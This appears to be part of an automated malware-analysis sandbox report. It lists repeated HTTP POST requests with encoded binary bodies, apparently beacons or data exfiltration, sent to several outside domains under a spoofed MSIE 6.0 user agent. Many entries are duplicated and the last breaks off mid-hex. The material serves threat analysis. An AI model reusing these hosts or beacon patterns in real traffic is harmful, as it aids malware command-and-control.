3A2vGFLBQSGYykJ5BXDOAFVCIoWixwHtpnRqGMKRHo7Ib9N9TZ/I7s8LVRuUgKTThGMTFM2NwT3RogHIO6ca/bfa3IaHniGXDZfJNcq89Tiry4fVc75gB0Rq6U+T/vIaI2OKnZJwS7ke/nJmavvCEfm8iEEyvboBfuzhadDrWSdXua5Px92Pl+Sr6wqaQ8R2d1Kgzy64A+2zS6+XULcmBI1Uo9urv0P4Obc9u5oc8Al+H+ug9sNtfivpX3pLxLhHYN3zGj4BMWy3AiYDP54lvhIh/Gf3CXSy9Bvj71a3WesJb2RCATIp1PoMiydReienIHMggaCAz3eZSL78X/eYHygyI47rRaV0zp41KTh7d2aXbS7TUHXbvxwlCaO1NfjCPGHNrQyDgNsAunnMZN3ORoiehQ0bnJyGkUtVFP1KV2Jxhq24mLjvq0gV4X1CTFGneqn2T3vZKWf2alm/52ZV+yxaZYUEYJUe28wmnLBfEm0n63llWLPgsP+h4lPNzDHLgX6XKilo+Ax7PR9OF+ACtrNwI8/hjdLZbGVujAK3w3vDwM5RmXntW7s+26iETrQITyfXqS14tg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 4a 35 77 39 55 75 65 79 72 79 46 41 64 56 6e 35 6c 68 4d 79 62 4c 42 46 49 49 78 64 64 65 77 32 43 37 30 62 2b 48 43 67 49 4d 5a 35 77 79 43 2f 6d 75 54 50 6e 76 53 57 6e 68 42 77 41 41 65 70 32 72 70 57 49 4e 33 51 58 37 42 55 7a 38 2f 67 66 5a 37 44 66 43 46 61 57 51 31 46 5a 61 49 46 68 31 59 47 5a 77 35 55 33 67 77 6e 37 66 4b 53 57 77 31 4e 45 66 31 54 72 49 78 78 75 4c 64 52 64 68 70 46 59 48 4f 59 4f 65 79 75 37 32 79 47 66 31 73 42 36 66 4b 33 58 48 34 4d 2b 76 39 59 57 54 79 4f 78 36 49 2f 32 53 72 2b 64 6b 51 55 77 75 72 35 6f 38 4e 30 66 52 6c 39 6c 72 42 45 50 4c 59 65 79 75 44 52 64 57 51 65 59 48 46 45 47 58 6b 42 70 54 6d 6f 39 72 45 2b 2b 79 52 31 34 6f 6b 7a 6d 72 6a 48 4c 41 48 76 2b 50 36 65 37 75 59 4e 7a 33 36 51 4d 58 48 4a 46 57 54 54 68 4e 77 2b 6c 32 71 4d 67 46 71 39 46 46 70 61 51 55 57 6a 2b 51 62 52 32 54 74 7a 48 44 35 68 36 2f 55 7a 63 63 36 7a 6d 78 45 43 38 67 76 53 67 48 68 62 46 53 58 6e 55 6b 68 2b 43 34 76 4c 43 38 30 59 62 44 75 31 54 44 34 38 79 4c 70 42 75 4b 48 4e 41 56 36 64 69 51 78 57 39 78 78 63 65 6a 44 45 43 74 67 41 51 50 54 33 35 47 71 75 39 72 72 61 39 38 33 4b 43 54 38 69 4b 51 45 47 32 69 37 57 4f 37 5a 52 50 55 45 64 35 2f 69 59 6a 47 6d 4d 39 4b 38 6f 58 6b 73 68 57 49 70 4d 41 38 6a 71 52 33 50 6e 35 67 50 4b 6e 6f 4f 38 56 74 4b 67 38 49 6a 4e 38 6d 59 51 4d 79 79 4b 76 53 73 45 6e 30 7a 6e 2f 77 6c 6f 68 71 4d 32 33 2b 79 35 44 6c 46 2b 48 42 77 4b 65 6a 32 4b 6f 30 4f 4f 49 30 70 65 4f 4b 67 41 4c 35 30 42 58 67 47 75 73 44 69 57 41 62 77 2f 4a 65 58 33 58 2f 30 64 4e 61 59 43 66 76 67 44 79 76 36 46 55 46 51 3d Data Ascii: J5w9UueyryFAdVn5lhMybLBFIIxddew2C70b+HCgIMZ5wyC/muTPnvSWnhBwAAep2rpWIN3QX7BUz8/gfZ7DfCFaWQ1FZaIFh1YGZw5U3gwn7fKSWw1NEf1TrIxxuLdRdhpFYHOYOeyu72yGf1sB6fK3XH4M+v9YWTyOx6I/2Sr+dkQUwur5o8N0fRl9lrBEPLYeyuDRdWQeYHFEGXkBpTmo9rE++yR14okzmrjHLAHv+P6e7uYNz36QMXHJFWTThNw+l2qMgFq9FFpaQUWj+QbR2TtzHD5h6/Uzcc6zmxEC8gvSgHhbFSXnUkh+C4vLC80YbDu1TD48yLpBuKHNAV6diQxW9xxcejDECtgAQPT35Gqu9rra983KCT8iKQEG2i7WO7ZRPUEd5/iYjGmM9K8oXkshWIpMA8jqR3Pn5gPKnoO8VtKg8IjN8mYQMyyKvSsEn0zn/wlohqM23+y5DlF+HBwKej2Ko0OOI0peOKgAL50BXgGusDiWAbw/JeX3X/0dNaYCfvgDyv6FUFQ=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 7a 4b 62 42 32 46 76 6a 2f 69 47 6d 52 4f 4f 63 63 73 44 5a 75 45 54 32 4d 44 76 68 73 50 75 5a 76 35 4b 43 6c 4c 47 51 6e 6b 4b 52 50 5a 56 6c 66 31 4a 4a 63 32 76 69 7a 61 4b 4f 77 50 41 2b 31 75 76 33 62 4c 48 44 70 35 48 75 45 4b 39 6f 36 63 76 53 49 50 6d 43 2b 34 49 67 58 79 58 43 77 48 39 69 59 33 66 77 41 34 74 64 41 6f 33 74 58 6f 78 50 38 58 49 5a 74 34 76 41 49 4e 38 48 4d 53 65 4f 6a 55 42 4d 66 4c 71 45 49 6f 46 72 5a 63 4d 63 64 74 76 72 30 52 6c 50 71 69 68 4c 59 45 56 35 44 37 49 4a 44 51 72 2f 59 72 32 35 2b 44 32 32 2b 41 36 50 66 43 42 76 4d 67 50 2f 45 68 38 39 41 4e 36 56 41 59 4a 7a 6f 53 63 58 68 31 51 75 32 62 57 66 66 76 59 2b 7a 2f 35 33 66 76 4a 63 4a 33 38 42 5a 2f 6a 33 76 33 75 54 33 35 47 41 31 72 35 52 46 33 47 42 77 47 47 59 73 52 46 58 54 34 64 48 78 4e 76 77 7a 39 70 6d 73 41 72 4d 73 35 6d 69 56 4d 51 34 42 73 71 79 35 59 41 58 72 6f 7a 67 65 77 55 4f 70 50 74 48 43 61 69 51 64 4d 75 6d 4b 53 6a 39 35 77 4d 53 67 4b 5a 6c 6a 4c 6b 4c 71 71 4e 77 4f 49 6d 62 34 58 74 68 62 2b 69 51 72 42 65 6e 2f 6c 6b 51 46 6e 77 7a 68 4c 2b 64 35 78 77 6f 61 65 2b 6e 79 72 4d 34 6c 51 32 5a 61 50 75 39 56 51 58 2b 6f 66 70 4c 6d 4a 58 70 2b 45 32 63 63 51 45 37 76 33 56 2b 77 33 53 61 6e 4e 74 59 4b 6e 78 46 63 76 37 43 56 30 48 6f 37 43 67 77 4f 35 38 72 6d 74 41 6c 78 4a 59 75 37 2f 69 32 4d 34 6b 73 44 7a 74 75 4f 65 42 49 56 69 31 55 43 50 51 41 59 38 4e 32 7a 4d 76 68 5a 36 75 54 4d 75 70 6d 71 34 6a 55 36 58 7a 63 59 4d 31 64 72 34 33 66 76 43 69 6c 52 70 42 4a 43 50 6d 77 52 59 46 6d 75 34 4d 44 66 4b 66 32 45 33 4b 78 57 78 50 64 56 72 62 48 75 44 6c 48 5a 78 31 4a 73 6b 62 51 6c 6f 47 48 6a 47 78 46 49 38 47 75 73 2b 2f 35 Data Ascii: zKbB2Fvj/iGmROOccsDZuET2MDvhsPuZv5KClLGQnkKRPZVlf1JJc2vizaKOwPA+1uv3bLHDp5HuEK9o6cvSIPmC+4IgXyXCwH9iY3fwA4tdAo3tXoxP8XIZt4vAIN8HMSeOjUBMfLqEIoFrZcMcdtvr0RlPqihLYEV5D7IJDQr/Yr25+D22+A6PfCBvMgP/Eh89AN6VAYJzoScXh1Qu2bWffvY+z/53fvJcJ38BZ/j3v3uT35GA1r5RF3GBwGGYsRFXT4dHxNvwz9pmsArMs5miVMQ4Bsqy5YAXrozgewUOpPtHCaiQdMumKSj95wMSgKZljLkLqqNwOImb4Xthb+iQrBen/lkQFnwzhL+d5xwoae+nyrM4lQ2ZaPu9VQX+ofpLmJXp+E2ccQE7v3V+w3SanNtYKnxFcv7CV0Ho7CgwO58rmtAlxJYu7/i2M4ksDztuOeBIVi1UCPQAY8N2zMvhZ6uTMupmq4jU6XzcYM1dr43fvCilRpBJCPmwRYFmu4MDfKf2E3KxWxPdVrbHuDlHZx1JskbQloGHjGxFI8Gus+/5
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 69 6f 55 6f 34 77 62 4c 4b 43 4a 4b 73 74 61 54 49 61 62 37 44 43 6c 61 68 48 42 6d 4e 53 39 4b 6d 68 38 63 2f 2f 69 36 44 4c 77 6f 65 38 7a 66 2b 74 6c 2b 6c 78 69 67 6f 30 4a 48 68 70 44 35 35 75 36 58 36 5a 54 55 45 65 58 32 6e 55 50 62 66 6e 4d 6f 54 2f 52 56 4b 49 34 52 37 72 4f 43 77 37 61 73 6f 42 66 2f 68 35 4d 31 55 32 54 53 53 32 45 66 30 74 54 4c 47 31 66 65 4f 46 68 61 39 44 44 79 43 58 54 52 63 4c 69 73 6a 51 72 31 4d 66 50 37 7a 4f 31 57 6b 61 38 30 6f 52 59 30 6b 67 63 6a 2b 62 77 73 4c 66 6d 2b 45 71 55 50 52 32 67 6a 67 6b 48 7a 4c 75 53 43 68 57 6a 7a 71 42 6b 66 53 79 44 37 57 54 71 4e 46 33 75 36 50 35 35 74 55 44 67 74 59 64 66 68 57 56 6a 64 6d 76 34 4e 2f 75 6c 49 76 39 56 47 2f 47 43 64 46 5a 6e 56 45 76 66 68 65 62 47 74 41 75 67 4a 70 42 41 37 4b 37 78 6f 56 4c 57 43 41 69 61 74 64 34 51 62 44 7a 45 43 43 54 54 61 57 68 66 46 6a 47 59 76 33 42 74 54 30 2f 65 78 6f 4a 36 68 61 79 44 4f 56 64 77 34 51 2b 71 42 69 75 4f 50 6e 37 79 53 70 4f 30 32 46 70 6b 4a 74 52 59 4a 59 5a 38 54 47 78 6f 58 49 53 4f 6e 6f 6b 48 50 2b 4b 50 31 6e 6f 54 61 76 77 46 6e 70 70 4c 51 6c 55 56 39 74 57 46 34 42 2b 32 67 6c 75 66 6c 48 67 41 54 2f 6d 78 56 55 73 6e 73 31 55 39 31 45 41 49 65 42 6c 76 78 44 71 48 30 52 70 78 47 79 67 76 50 71 54 72 6d 62 5a 78 38 4a 35 71 4b 2b 44 36 2f 42 78 56 4c 5a 37 76 51 52 58 78 64 4a 30 48 6e 51 31 73 64 4b 56 73 56 37 61 7a 57 56 6c 42 6a 7a 34 75 2f 58 38 61 6d 56 61 39 36 30 64 4f 56 4b 73 47 6a 70 6b 6c 4b 6f 5a 43 62 4e 4c 47 42 68 32 42 30 33 72 63 58 79 2f 42 47 67 4d 4c 48 42 41 62 44 78 6c 35 33 31 63 68 32 43 68 78 74 47 2b 46 69 57 76 6a 49 Data Ascii: ioUo4wbLKCJKstaTIab7DClahHBmNS9Kmh8c//i6DLwoe8zf+tl+lxigo0JHhpD55u6X6ZTUEeX2nUPbfnMoT/RVKI4R7rOCw7asoBf/h5M1U2TSS2Ef0tTLG1feOFha9DDyCXTRcLisjQr1MfP7zO1Wka80oRY0kgcj+bwsLfm+EqUPR2gjgkHzLuSChWjzqBkfSyD7WTqNF3u6P55tUDgtYdfhWVjdmv4N/ulIv9VG/GCdFZnVEvfhebGtAugJpBA7K7xoVLWCAiatd4QbDzECCTTaWhfFjGYv3BtT0/exoJ6hayDOVdw4Q+qBiuOPn7ySpO02FpkJtRYJYZ8TGxoXISOnokHP+KP1noTavwFnppLQlUV9tWF4B+2gluflHgAT/mxVUsns1U91EAIeBlvxDqH0RpxGygvPqTrmbZx8J5qK+D6/BxVLZ7vQRXxdJ0HnQ1sdKVsV7azWVlBjz4u/X8amVa960dOVKsGjpklKoZCbNLGBh2B03rcXy/BGgMLHBAbDxl531ch2ChxtG+FiWvjI
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 7a 4b 62 42 32 46 76 6a 2f 69 47 6d 52 4f 4f 63 63 73 44 5a 75 45 54 32 4d 44 76 68 73 50 75 5a 76 35 4b 43 6c 4c 47 51 6e 6b 4b 52 50 5a 56 6c 66 31 4a 4a 63 32 76 69 7a 61 4b 4f 77 50 41 2b 31 75 76 33 62 4c 48 44 70 35 48 75 45 4b 39 6f 36 63 76 53 49 50 6d 43 2b 34 49 67 58 79 58 43 77 48 39 69 59 33 66 77 41 34 74 64 41 6f 33 74 58 6f 78 50 38 58 49 5a 74 34 76 41 49 4e 38 48 4d 53 65 4f 6a 55 42 4d 66 4c 71 45 49 6f 46 72 5a 63 4d 63 64 74 76 72 30 52 6c 50 71 69 68 4c 59 45 56 35 44 37 49 4a 44 51 72 2f 59 72 32 35 2b 44 32 32 2b 41 36 50 66 43 42 76 4d 67 50 2f 45 68 38 39 41 4e 36 56 41 59 4a 7a 6f 53 63 58 68 31 51 75 32 62 57 66 66 76 59 2b 7a 2f 35 33 66 76 4a 63 4a 33 38 42 5a 2f 6a 33 76 33 75 54 33 35 47 41 31 72 35 52 46 33 47 42 77 47 47 59 73 52 46 58 54 34 64 48 78 4e 76 77 7a 39 70 6d 73 41 72 4d 73 35 6d 69 56 4d 51 34 42 73 71 79 35 59 41 58 72 6f 7a 67 65 77 55 4f 70 50 74 48 43 61 69 51 64 4d 75 6d 4b 53 6a 39 35 77 4d 53 67 4b 5a 6c 6a 4c 6b 4c 71 71 4e 77 4f 49 6d 62 34 58 74 68 62 2b 69 51 72 42 65 6e 2f 6c 6b 51 46 6e 77 7a 68 4c 2b 64 35 78 77 6f 61 65 2b 6e 79 72 4d 34 6c 51 32 5a 61 50 75 39 56 51 58 2b 6f 66 70 4c 6d 4a 58 70 2b 45 32 63 63 51 45 37 76 33 56 2b 77 33 53 61 6e 4e 74 59 4b 6e 78 46 63 76 37 43 56 30 48 6f 37 43 67 77 4f 35 38 72 6d 74 41 6c 78 4a 59 75 37 2f 69 32 4d 34 6b 73 44 7a 74 75 4f 65 42 49 56 69 31 55 43 50 51 41 59 38 4e 32 7a 4d 76 68 5a 36 75 54 4d 75 70 6d 71 34 6a 55 36 58 7a 63 59 4d 31 64 72 34 33 66 76 43 69 6c 52 70 42 4a 43 50 6d 77 52 59 46 6d 75 34 4d 44 66 4b 66 32 45 33 4b 78 57 78 50 64 56 72 62 48 75 44 6c 48 5a 78 31 4a 73 6b 62 51 6c 6f 47 48 6a 47 78 46 49 38 47 75 73 2b 2f 35 Data Ascii: zKbB2Fvj/iGmROOccsDZuET2MDvhsPuZv5KClLGQnkKRPZVlf1JJc2vizaKOwPA+1uv3bLHDp5HuEK9o6cvSIPmC+4IgXyXCwH9iY3fwA4tdAo3tXoxP8XIZt4vAIN8HMSeOjUBMfLqEIoFrZcMcdtvr0RlPqihLYEV5D7IJDQr/Yr25+D22+A6PfCBvMgP/Eh89AN6VAYJzoScXh1Qu2bWffvY+z/53fvJcJ38BZ/j3v3uT35GA1r5RF3GBwGGYsRFXT4dHxNvwz9pmsArMs5miVMQ4Bsqy5YAXrozgewUOpPtHCaiQdMumKSj95wMSgKZljLkLqqNwOImb4Xthb+iQrBen/lkQFnwzhL+d5xwoae+nyrM4lQ2ZaPu9VQX+ofpLmJXp+E2ccQE7v3V+w3SanNtYKnxFcv7CV0Ho7CgwO58rmtAlxJYu7/i2M4ksDztuOeBIVi1UCPQAY8N2zMvhZ6uTMupmq4jU6XzcYM1dr43fvCilRpBJCPmwRYFmu4MDfKf2E3KxWxPdVrbHuDlHZx1JskbQloGHjGxFI8Gus+/5
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 7a 68 4f 54 68 72 6a 72 65 43 4b 65 49 6b 6d 2f 4f 7a 74 32 4c 36 76 6e 47 5a 59 41 4d 64 75 61 62 48 6f 68 4d 4f 49 41 7a 38 75 74 56 68 6b 42 4b 38 31 6d 36 74 67 66 78 6d 50 42 50 70 61 31 49 53 4e 33 72 67 46 75 41 62 53 63 6a 6a 32 7a 6e 7a 49 53 50 52 32 70 6f 74 4a 32 49 75 30 64 61 6a 74 64 61 78 33 62 73 32 67 59 6d 6a 49 51 33 4b 53 59 75 34 39 47 69 36 49 53 4e 38 53 33 70 57 70 57 43 2f 6f 48 38 6f 67 73 77 77 70 64 55 35 53 75 31 5a 41 64 32 54 4d 62 7a 36 54 6a 55 4c 65 70 33 58 65 68 58 68 54 39 74 6e 43 34 67 4e 55 6d 31 7a 6f 36 54 44 50 78 72 31 65 32 73 6f 68 66 53 30 68 4a 2b 53 6c 36 56 4c 42 41 48 6c 6c 79 71 4c 76 73 74 42 70 4f 71 75 4e 65 4b 54 73 4a 46 31 70 2f 71 66 55 47 33 43 4b 54 73 30 62 30 6c 44 63 61 7a 69 58 32 33 66 31 64 39 6e 53 73 79 52 61 6d 53 69 33 6f 47 69 6a 56 79 35 50 43 58 77 66 4c 4b 68 2f 4f 69 33 53 6f 2b 34 59 36 53 44 30 77 70 2f 48 5a 79 69 34 7a 66 6b 7a 36 31 46 39 50 70 54 5a 6c 72 39 6a 79 42 61 59 4d 58 5a 68 2f 35 65 62 37 2f 70 79 6a 58 4a 75 68 2b 54 36 62 42 79 63 57 57 66 33 73 75 62 36 47 5a 37 6a 49 61 69 66 6a 33 53 50 45 2b 69 35 54 4d 4d 50 36 47 43 62 70 70 4b 2b 38 6b 6b 46 53 33 71 58 54 36 33 75 52 4e 48 4d 49 75 59 42 61 48 77 70 33 76 56 48 62 4c 49 59 63 69 66 6c 54 75 42 77 2f 75 50 4d 41 72 7a 33 64 72 78 46 66 46 43 35 7a 77 4d 41 32 52 45 6a 67 73 53 32 55 33 2b 56 51 70 74 32 74 67 2b 2f 6d 69 6e 5a 58 32 51 64 6b 32 72 37 61 4d 6f 36 37 4a 68 35 79 59 47 77 42 39 4b 72 37 37 63 74 56 79 79 68 50 78 41 6c 48 74 35 57 30 68 56 44 32 38 59 57 6e 6c 45 48 6f 59 64 6d 69 5a 47 4e 7a 4f 62 57 47 70 59 56 38 76 5a 50 77 4e 74 65 57 52 74 7a 2b 35 53 48 56 58 53 33 44 6b 4a 77 4c 57 52 70 30 4b 74 68 54 75 4c 72 5a 67 38 58 75 55 36 5a 62 65 63 51 6d 39 62 65 79 Data Ascii: zhOThrjreCKeIkm/Ozt2L6vnGZYAMduabHohMOIAz8utVhkBK81m6tgfxmPBPpa1ISN3rgFuAbScjj2znzISPR2potJ2Iu0dajtdax3bs2gYmjIQ3KSYu49Gi6ISN8S3pWpWC/oH8ogswwpdU5Su1ZAd2TMbz6TjULep3XehXhT9tnC4gNUm1zo6TDPxr1e2sohfS0hJ+Sl6VLBAHllyqLvstBpOquNeKTsJF1p/qfUG3CKTs0b0lDcaziX23f1d9nSsyRamSi3oGijVy5PCXwfLKh/Oi3So+4Y6SD0wp/HZyi4zfkz61F9PpTZlr9jyBaYMXZh/5eb7/pyjXJuh+T6bBycWWf3sub6GZ7jIaifj3SPE+i5TMMP6GCbppK+8kkFS3qXT63uRNHMIuYBaHwp3vVHbLIYciflTuBw/uPMArz3drxFfFC5zwMA2REjgsS2U3+VQpt2tg+/minZX2Qdk2r7aMo67Jh5yYGwB9Kr77ctVyyhPxAlHt5W0hVD28YWnlEHoYdmiZGNzObWGpYV8vZPwNteWRtz+5SHVXS3DkJwLWRp0KthTuLrZg8XuU6ZbecQm9bey
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 7a 39 38 57 41 79 67 47 5a 43 4c 72 76 67 7a 7a 36 7a 50 66 62 35 75 62 54 74 34 77 64 4b 72 58 33 45 4d 57 75 4f 37 7a 4b 77 36 30 47 50 46 47 38 49 6e 56 79 44 56 4d 35 39 54 47 62 79 42 2f 77 45 46 6d 39 41 58 31 6d 73 64 4a 76 30 69 48 30 51 76 39 47 38 49 2f 52 77 4c 57 45 4a 31 2b 63 4e 4a 7a 59 41 69 46 6e 39 64 34 76 4e 34 73 75 6a 33 37 57 59 61 6c 76 38 61 47 44 63 65 31 73 57 67 35 78 72 4c 4a 6f 7a 31 30 42 78 45 2b 33 36 6a 33 53 50 46 2f 65 31 6c 48 74 51 4c 74 52 6c 48 6e 31 66 30 32 56 50 6d 72 30 32 67 54 2b 7a 35 75 36 57 2b 5a 48 33 57 57 6e 34 6f 68 6d 30 67 53 63 6d 62 66 4a 77 6d 51 62 61 37 6f 44 6c 52 56 70 55 6b 42 6e 2f 45 69 33 58 42 79 6b 4a 7a 67 70 64 79 35 37 49 71 52 2f 78 2b 34 48 4a 75 4e 2f 69 43 73 76 33 73 64 64 52 72 44 73 49 61 47 39 30 67 37 4a 41 41 64 45 66 67 4c 53 7a 78 31 39 61 45 2f 51 34 47 75 37 2f 56 7a 2f 46 62 74 4c 6b 48 44 78 74 69 64 71 50 44 61 79 73 38 31 63 41 50 55 51 4d 49 46 4d 39 67 4b 77 71 7a 5a 36 6c 47 6e 61 61 64 6a 4f 78 53 38 56 58 6e 78 6a 6d 36 36 4a 56 36 6f 44 4e 64 39 58 42 66 44 65 37 2f 54 76 44 6e 4e 6b 50 67 2b 75 47 56 54 4e 34 68 42 65 6d 38 65 62 41 51 4a 4c 42 78 57 67 2f 58 6b 6d 34 67 50 38 74 4e 71 48 67 5a 58 56 34 6b 34 63 35 73 36 66 2f 32 6f 63 48 2f 31 34 53 4e 61 66 38 35 55 67 4d 39 55 54 64 47 41 55 43 2f 63 64 49 57 30 65 45 62 33 65 65 70 4a 34 31 75 7a 32 45 66 70 77 71 69 41 69 57 71 63 4d 67 6b 54 39 74 71 2b 49 6f 7a 6b 76 4e 69 65 2f 33 44 55 54 33 49 59 73 6d 51 52 45 7a 6b 52 6c 77 36 6e 53 76 77 31 48 75 30 68 48 4d 6c 34 53 49 76 6e 4c 70 4b 31 79 46 59 37 35 70 72 62 4e 45 6f 7a 77 39 63 65 68 31 5a 64 69 71 55 2b 67 6e 34 3d Data Ascii: z98WAygGZCLrvgzz6zPfb5ubTt4wdKrX3EMWuO7zKw60GPFG8InVyDVM59TGbyB/wEFm9AX1msdJv0iH0Qv9G8I/RwLWEJ1+cNJzYAiFn9d4vN4suj37WYalv8aGDce1sWg5xrLJoz10BxE+36j3SPF/e1lHtQLtRlHn1f02VPmr02gT+z5u6W+ZH3WWn4ohm0gScmbfJwmQba7oDlRVpUkBn/Ei3XBykJzgpdy57IqR/x+4HJuN/iCsv3sddRrDsIaG90g7JAAdEfgLSzx19aE/Q4Gu7/Vz/FbtLkHDxtidqPDays81cAPUQMIFM9gKwqzZ6lGnaadjOxS8VXnxjm66JV6oDNd9XBfDe7/TvDnNkPg+uGVTN4hBem8ebAQJLBxWg/Xkm4gP8tNqHgZXV4k4c5s6f/2ocH/14SNaf85UgM9UTdGAUC/cdIW0eEb3eepJ41uz2EfpwqiAiWqcMgkT9tq+IozkvNie/3DUT3IYsmQREzkRlw6nSvw1Hu0hHMl4SIvnLpK1yFY75prbNEozw9ceh1ZdiqU+gn4=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 7a 68 4f 54 68 72 6a 72 65 43 4b 65 49 6b 6d 2f 4f 7a 74 32 4c 36 76 6e 47 5a 59 41 4d 64 75 61 62 48 6f 68 4d 4f 49 41 7a 38 75 74 56 68 6b 42 4b 38 31 6d 36 74 67 66 78 6d 50 42 50 70 61 31 49 53 4e 33 72 67 46 75 41 62 53 63 6a 6a 32 7a 6e 7a 49 53 50 52 32 70 6f 74 4a 32 49 75 30 64 61 6a 74 64 61 78 33 62 73 32 67 59 6d 6a 49 51 33 4b 53 59 75 34 39 47 69 36 49 53 4e 38 53 33 70 57 70 57 43 2f 6f 48 38 6f 67 73 77 77 70 64 55 35 53 75 31 5a 41 64 32 54 4d 62 7a 36 54 6a 55 4c 65 70 33 58 65 68 58 68 54 39 74 6e 43 34 67 4e 55 6d 31 7a 6f 36 54 44 50 78 72 31 65 32 73 6f 68 66 53 30 68 4a 2b 53 6c 36 56 4c 42 41 48 6c 6c 79 71 4c 76 73 74 42 70 4f 71 75 4e 65 4b 54 73 4a 46 31 70 2f 71 66 55 47 33 43 4b 54 73 30 62 30 6c 44 63 61 7a 69 58 32 33 66 31 64 39 6e 53 73 79 52 61 6d 53 69 33 6f 47 69 6a 56 79 35 50 43 58 77 66 4c 4b 68 2f 4f 69 33 53 6f 2b 34 59 36 53 44 30 77 70 2f 48 5a 79 69 34 7a 66 6b 7a 36 31 46 39 50 70 54 5a 6c 72 39 6a 79 42 61 59 4d 58 5a 68 2f 35 65 62 37 2f 70 79 6a 58 4a 75 68 2b 54 36 62 42 79 63 57 57 66 33 73 75 62 36 47 5a 37 6a 49 61 69 66 6a 33 53 50 45 2b 69 35 54 4d 4d 50 36 47 43 62 70 70 4b 2b 38 6b 6b 46 53 33 71 58 54 36 33 75 52 4e 48 4d 49 75 59 42 61 48 77 70 33 76 56 48 62 4c 49 59 63 69 66 6c 54 75 42 77 2f 75 50 4d 41 72 7a 33 64 72 78 46 66 46 43 35 7a 77 4d 41 32 52 45 6a 67 73 53 32 55 33 2b 56 51 70 74 32 74 67 2b 2f 6d 69 6e 5a 58 32 51 64 6b 32 72 37 61 4d 6f 36 37 4a 68 35 79 59 47 77 42 39 4b 72 37 37 63 74 56 79 79 68 50 78 41 6c 48 74 35 57 30 68 56 44 32 38 59 57 6e 6c 45 48 6f 59 64 6d 69 5a 47 4e 7a 4f 62 57 47 70 59 56 38 76 5a 50 77 4e 74 65 57 52 74 7a 2b 35 53 48 56 58 53 33 44 6b 4a 77 4c 57 52 70 30 4b 74 68 54 75 4c 72 5a 67 38 58 75 55 36 5a 62 65 63 51 6d 39 62 65 79 Data Ascii: zhOThrjreCKeIkm/Ozt2L6vnGZYAMduabHohMOIAz8utVhkBK81m6tgfxmPBPpa1ISN3rgFuAbScjj2znzISPR2potJ2Iu0dajtdax3bs2gYmjIQ3KSYu49Gi6ISN8S3pWpWC/oH8ogswwpdU5Su1ZAd2TMbz6TjULep3XehXhT9tnC4gNUm1zo6TDPxr1e2sohfS0hJ+Sl6VLBAHllyqLvstBpOquNeKTsJF1p/qfUG3CKTs0b0lDcaziX23f1d9nSsyRamSi3oGijVy5PCXwfLKh/Oi3So+4Y6SD0wp/HZyi4zfkz61F9PpTZlr9jyBaYMXZh/5eb7/pyjXJuh+T6bBycWWf3sub6GZ7jIaifj3SPE+i5TMMP6GCbppK+8kkFS3qXT63uRNHMIuYBaHwp3vVHbLIYciflTuBw/uPMArz3drxFfFC5zwMA2REjgsS2U3+VQpt2tg+/minZX2Qdk2r7aMo67Jh5yYGwB9Kr77ctVyyhPxAlHt5W0hVD28YWnlEHoYdmiZGNzObWGpYV8vZPwNteWRtz+5SHVXS3DkJwLWRp0KthTuLrZg8XuU6ZbecQm9bey
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 7a 68 4f 54 68 72 6a 72 65 43 4b 65 49 6b 6d 2f 4f 7a 74 32 4c 36 76 6e 47 5a 59 41 4d 64 75 61 62 48 6f 68 4d 4f 49 41 7a 38 75 74 56 68 6b 42 4b 38 31 6d 36 74 67 66 78 6d 50 42 50 70 61 31 49 53 4e 33 72 67 46 75 41 62 53 63 6a 6a 32 7a 6e 7a 49 53 50 52 32 70 6f 74 4a 32 49 75 30 64 61 6a 74 64 61 78 33 62 73 32 67 59 6d 6a 49 51 33 4b 53 59 75 34 39 47 69 36 49 53 4e 38 53 33 70 57 70 57 43 2f 6f 48 38 6f 67 73 77 77 70 64 55 35 53 75 31 5a 41 64 32 54 4d 62 7a 36 54 6a 55 4c 65 70 33 58 65 68 58 68 54 39 74 6e 43 34 67 4e 55 6d 31 7a 6f 36 54 44 50 78 72 31 65 32 73 6f 68 66 53 30 68 4a 2b 53 6c 36 56 4c 42 41 48 6c 6c 79 71 4c 76 73 74 42 70 4f 71 75 4e 65 4b 54 73 4a 46 31 70 2f 71 66 55 47 33 43 4b 54 73 30 62 30 6c 44 63 61 7a 69 58 32 33 66 31 64 39 6e 53 73 79 52 61 6d 53 69 33 6f 47 69 6a 56 79 35 50 43 58 77 66 4c 4b 68 2f 4f 69 33 53 6f 2b 34 59 36 53 44 30 77 70 2f 48 5a 79 69 34 7a 66 6b 7a 36 31 46 39 50 70 54 5a 6c 72 39 6a 79 42 61 59 4d 58 5a 68 2f 